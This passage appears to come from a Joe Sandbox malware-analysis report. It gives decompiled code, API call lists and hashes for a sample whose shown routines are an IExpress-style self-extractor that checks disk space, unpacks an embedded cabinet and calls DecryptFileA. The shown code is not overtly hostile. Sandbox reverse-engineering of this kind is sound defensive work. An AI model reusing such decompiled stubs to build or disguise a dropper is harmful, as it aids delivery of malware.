                                                                                                                                                                                                        • Opcode ID: 879b53380b5014ab32a4bc6bdfbd200a4d8b79a59e28bb2caeb59a4eddadec14
                                                                                                                                                                                                        • Instruction ID: 5d37c1aef25310143e636aec8a28085adb1cd2a2737901ba0f95be94b6d46849
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 879b53380b5014ab32a4bc6bdfbd200a4d8b79a59e28bb2caeb59a4eddadec14
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CA139B0A002145FEB20BB24CC45BEA77ADDB81714F1466D5E55DB32D1EBB09D8BCB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 e8597d-e859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 e859bb-e859d8 call e844b9 call e86285 324->325 326 e859dd-e85a1b GetDiskFreeSpaceA 324->326 345 e85c05-e85c14 call e86ce0 325->345 327 e85ba1-e85bde memset call e86285 GetLastError FormatMessageA 326->327 328 e85a21-e85a4a MulDiv 326->328 337 e85be3-e85bfc call e844b9 SetCurrentDirectoryA 327->337 328->327 331 e85a50-e85a6c GetVolumeInformationA 328->331 334 e85a6e-e85ab0 memset call e86285 GetLastError FormatMessageA 331->334 335 e85ab5-e85aca SetCurrentDirectoryA 331->335 334->337 339 e85acc-e85ad1 335->339 351 e85c02 337->351 343 e85ae2-e85ae4 339->343 344 e85ad3-e85ad8 339->344 349 e85ae6 343->349 350 e85ae7-e85af8 343->350 344->343 347 e85ada-e85ae0 344->347 347->339 347->343 349->350 353 e85af9-e85afb 350->353 354 e85c04 351->354 355 e85afd-e85b03 353->355 356 e85b05-e85b08 353->356 354->345 355->353 355->356 357 e85b0a-e85b1b call e844b9 356->357 358 e85b20-e85b27 356->358 357->351 360 e85b29-e85b33 358->360 361 e85b52-e85b5b 358->361 360->361 363 e85b35-e85b50 360->363 364 e85b62-e85b6d 361->364 363->364 365 e85b6f-e85b74 364->365 366 e85b76-e85b7d 364->366 367 e85b85 365->367 368 e85b7f-e85b81 366->368 369 e85b83 366->369 370 e85b96-e85b9f 367->370 371 e85b87-e85b94 call e8268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00E8597D(CHAR* __ecx, signed char __edx, void* __edi, char _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0xe89124 = E00E86285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E00E844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0xe89a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0xe89a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0xe89a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0xe889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0xe89124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t40 =  &_a4; // 0xe86277
                                                                                                                                                                                                        									_t66 = E00E8268B( *_t40, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0xe89a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0xe889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xe889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0xe89a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E00E844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E00E844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E00E86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00e85c05
                                                                                                                                                                                                        0x00e85c14
                                                                                                                                                                                                        0x00e85c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E859A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00E859AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00E85A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00E85A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E85A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E85A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E85A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00E85AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00E85BFC
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID: wb
                                                                                                                                                                                                        • API String ID: 4237285672-1758207633
                                                                                                                                                                                                        • Opcode ID: efcb1b1061b1a7245b5479fb176a3ef669503a787c4738486a8ea5a2f949d905
                                                                                                                                                                                                        • Instruction ID: 3faa8a5ec5c8bc7ff30befcb8619247626942081d7ebf362d0d2ec3f70f6df68
                                                                                                                                                                                                        • Opcode Fuzzy Hash: efcb1b1061b1a7245b5479fb176a3ef669503a787c4738486a8ea5a2f949d905
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A71A3B290060CAFEB15EB65CC85BFB77ACEB48344F5451AAF54DF6140DA309E888B20
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 e84fe0-e8501a call e8468f FindResourceA LoadResource LockResource 377 e85020-e85027 374->377 378 e85161-e85163 374->378 379 e85029-e85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 e85057-e8505e call e84efd 377->380 379->380 383 e8507c-e850b4 380->383 384 e85060-e85077 call e844b9 380->384 389 e850e8-e85104 call e844b9 383->389 390 e850b6-e850da 383->390 388 e85107-e8510e 384->388 392 e8511d-e8511f 388->392 393 e85110-e85117 FreeResource 388->393 399 e85106 389->399 398 e850dc 390->398 390->399 396 e8513a-e85141 392->396 397 e85121-e85127 392->397 393->392 401 e8515f 396->401 402 e85143-e8514a 396->402 397->396 400 e85129-e85135 call e844b9 397->400 405 e850e3-e850e6 398->405 399->388 400->396 401->378 402->401 403 e8514c-e85159 SendMessageA 402->403 403->401 405->389 405->399
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00E84FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0xe89144 = E00E8468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xe89140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xe88584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xe88584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E00E84EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E00E84CA0, E00E84CC0, E00E84980, E00E84A50, E00E84AD0, E00E84B60, E00E84BC0, 1, 0xe89148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xe89148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xe88584; // 0x0
                                                                                                                                                                                                        						E00E844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xe81140, 0, E00E84CD0, 0, 0xe89140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xe88584; // 0x0
                                                                                                                                                                                                        					E00E844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xe89140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xe89140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xe891d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E00E844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xe88a38 & 0x00000001) == 0 && ( *0xe89a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xe88584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        0x00e85104
                                                                                                                                                                                                        0x00e85106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85106
                                                                                                                                                                                                        0x00e850cd
                                                                                                                                                                                                        0x00e850d3
                                                                                                                                                                                                        0x00e850da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e850dd
                                                                                                                                                                                                        0x00e850e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85060
                                                                                                                                                                                                        0x00e85060
                                                                                                                                                                                                        0x00e85070
                                                                                                                                                                                                        0x00e85075
                                                                                                                                                                                                        0x00e85107
                                                                                                                                                                                                        0x00e85107
                                                                                                                                                                                                        0x00e8510e
                                                                                                                                                                                                        0x00e85111
                                                                                                                                                                                                        0x00e85117
                                                                                                                                                                                                        0x00e85117
                                                                                                                                                                                                        0x00e8511f
                                                                                                                                                                                                        0x00e85121
                                                                                                                                                                                                        0x00e85127
                                                                                                                                                                                                        0x00e85135
                                                                                                                                                                                                        0x00e85135
                                                                                                                                                                                                        0x00e85127
                                                                                                                                                                                                        0x00e85141
                                                                                                                                                                                                        0x00e85159
                                                                                                                                                                                                        0x00e85159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00E84FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00E85006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00E8500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00E85030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E85037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00E8504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E85051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00E85111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00E85159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 59ef07d4dc852fccff5dea3df1c5ce91909cc626489fe8f5a80159ea44a07e1d
                                                                                                                                                                                                        • Instruction ID: 25199d8f7938e6b2393cbebd9ee5842785623a4c3d03ae72cb2f1be778ee2e3b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59ef07d4dc852fccff5dea3df1c5ce91909cc626489fe8f5a80159ea44a07e1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D31A4B16827026FE7207B62AE8DF67369DE744B59F092025F90EB62E2DE648C048751
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 e82f1d-e82f3d 451 e82f6c-e82f73 call e85164 450->451 452 e82f3f-e82f46 450->452 460 e82f79-e82f80 call e855a0 451->460 461 e83041 451->461 454 e82f48 call e851e5 452->454 455 e82f5f-e82f66 call e83a3f 452->455 462 e82f4d-e82f4f 454->462 455->451 455->461 460->461 468 e82f86-e82fbe GetSystemDirectoryA call e8658a LoadLibraryA 460->468 464 e83043-e83053 call e86ce0 461->464 462->461 465 e82f55-e82f5d 462->465 465->451 465->455 472 e82fc0-e82fd4 GetProcAddress 468->472 473 e82ff7-e83004 FreeLibrary 468->473 472->473 476 e82fd6-e82fee DecryptFileA 472->476 474 e83006-e8300c 473->474 475 e83017-e83024 SetCurrentDirectoryA 473->475 474->475 477 e8300e call e8621e 474->477 478 e83054-e8305a 475->478 479 e83026-e8303c call e844b9 call e86285 475->479 476->473 490 e82ff0-e82ff5 476->490 488 e83013-e83015 477->488 480 e8305c call e83b26 478->480 481 e83065-e8306c 478->481 479->461 491 e83061-e83063 480->491 486 e8307c-e83089 481->486 487 e8306e-e83075 call e8256d 481->487 493 e8308b-e83091 486->493 494 e830a1-e830a9 486->494 496 e8307a 487->496 488->461 488->475 490->473 491->461 491->481 493->494 497 e83093 call e83ba2 493->497 499 e830ab-e830ad 494->499 500 e830b4-e830b7 494->500 496->486 504 e83098-e8309a 497->504 499->500 502 e830af call e84169 499->502 500->464 502->500 504->461 505 e8309c 504->505 505->494
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E82F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xe88a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E00E85164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E00E86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E00E855A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E00E8658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0xe8a288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
